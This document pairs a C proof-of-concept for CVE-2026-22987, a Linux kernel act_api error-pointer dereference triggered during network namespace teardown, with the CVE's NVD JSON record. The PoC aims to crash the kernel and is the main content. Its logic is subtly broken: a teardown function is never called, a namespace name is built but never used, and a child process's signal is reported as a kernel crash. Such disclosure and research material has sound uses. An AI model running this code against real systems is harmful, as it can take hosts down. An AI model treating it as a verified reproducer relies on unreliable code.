CVE-2026-22987

// CVE-2026-22987 PoC - Linux Kernel net/sched act_api NULL Pointer Dereference // This PoC demonstrates triggering the vulnerability through netns teardown // Note: Requires kernel debugging symbols and proper environment setup #include <stdio.h> #include <stdlib.h> #include <string.h> #include <unistd.h> #include <sys/wait.h> #include <sys/stat.h> #include <sys/types.h> #include <sched.h> #include <net/if.h> #include <linux/if_tun.h> #include <fcntl.h> #define MAX_TC_ACTIONS 100 int create_netns() { int netns_fd; char netns_name[64]; // Create unique network namespace snprintf(netns_name, sizeof(netns_name), "cve_2026_22987_%d", getpid()); // Create network namespace using unshare if (unshare(CLONE_NEWNET) != 0) { perror("unshare(CLONE_NEWNET) failed"); return -1; } return 0; } int setup_tc_actions() { // Setup traffic control actions that may leave ERR_PTR entries // This simulates the condition where tcf_idrinfo_destroy encounters // ERR_PTR(-EBUSY) values during netns teardown char cmd[256]; // Create qdisc first system("tc qdisc add dev lo root handle 1: prio 2>/dev/null"); // Add multiple actions that may fail and leave error pointers for (int i = 0; i < MAX_TC_ACTIONS; i++) { snprintf(cmd, sizeof(cmd), "tc actions add action drop index %d 2>/dev/null", i); system(cmd); } return 0; } int trigger_teardown() { // Trigger netns teardown which calls tcf_idrinfo_destroy // This is where the vulnerability is triggered // Exit the network namespace to trigger cleanup // The kernel will call tcf_idrinfo_destroy during netns exit // Remount to default namespace system("ip netns delete $(ip netns list | grep cve_2026_22987 | awk '{print $1}') 2>/dev/null"); return 0; } int main(int argc, char *argv[]) { printf("[*] CVE-2026-22987 PoC - Linux Kernel act_api NULL Pointer Dereference\n"); printf("[*] Target: Linux Kernel net/sched/act_api.c tcf_idrinfo_destroy()\n"); printf("[*] CVSS: 5.5 (Medium) - AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H\n\n"); pid_t pid = fork(); if (pid < 0) { perror("fork failed"); return 1; } if (pid == 0) { // Child process - create network namespace and trigger vulnerability if (create_netns() < 0) { exit(1); } setup_tc_actions(); printf("[+] Network namespace created with TC actions\n"); printf("[*] Exiting namespace to trigger netns teardown...\n"); // Exit to trigger tcf_idrinfo_destroy exit(0); } else { // Parent process - wait for child and observe crash int status; waitpid(pid, &status, 0); if (WIFSIGNALED(status)) { printf("[!] Kernel crash detected (signal %d)\n", WTERMSIG(status)); printf("[+] Vulnerability confirmed!\n"); } else if (WEXITSTATUS(status) == 0) { printf("[*] Process exited normally (may need root privileges)\n"); } else { printf("[*] Process exited with status: %d\n", WEXITSTATUS(status)); } } printf("\n[*] PoC execution completed\n"); return 0; } // Compilation: gcc -o cve_2026_22987_poc cve_2026_22987_poc.c // Execution: Requires root privileges to create network namespaces // Note: Actual exploitation requires specific kernel configuration and version

{"cve": {"id": "CVE-2026-22987", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2026-01-23T16:15:54.757", "lastModified": "2026-02-26T18:49:04.210", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet/sched: act_api: avoid dereferencing ERR_PTR in tcf_idrinfo_destroy\n\nsyzbot reported a crash in tc_act_in_hw() during netns teardown where\ntcf_idrinfo_destroy() passed an ERR_PTR(-EBUSY) value as a tc_action\npointer, leading to an invalid dereference.\n\nGuard against ERR_PTR entries when iterating the action IDR so teardown\ndoes not call tc_act_in_hw() on an error pointer."}, {"lang": "es", "value": "En el kernel de Linux, la siguiente vulnerabilidad ha sido resuelta:\n\nnet/sched: act_api: evitar la desreferenciación de ERR_PTR en tcf_idrinfo_destroy\n\nsyzbot informó de un fallo en tc_act_in_hw() durante el desmontaje de netns donde tcf_idrinfo_destroy() pasó un valor ERR_PTR(-EBUSY) como un puntero tc_action, lo que llevó a una desreferenciación inválida.\n\nProtegerse contra entradas ERR_PTR al iterar el IDR de acción para que el desmontaje no llame a tc_act_in_hw() en un puntero de error."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-476"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.17", "versionEndExcluding": "6.18.6", "matchCriteriaId": "F535E896-F773-4ED1-84E6-317F81D02785"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.19:rc1:*:*:*:*:*:*", "matchCriteriaId": "17B67AA7-40D6-4AFA-8459-F200F3D7CFD1"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.19:rc2:*:*:*:*:*:*", "matchCriteriaId": "C47E4CC9-C826-4FA9-B014-7FE3D9B318B2"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.19:rc3:*:*:*:*:*:*", "matchCriteriaId": "F71D92C0-C023-48BD-B3B6-70B638EEE298"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.19:rc4:*:*:*:*:*:*", "matchCriteriaId": "13580667-0A98-40CC-B29F-D12790B91BDB"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/67550a1130b647bb0d093c9c0a810c69aa6a30a8", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/adb25a46dc0a43173f5ea5f5f58fc8ba28970c7c", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}]}}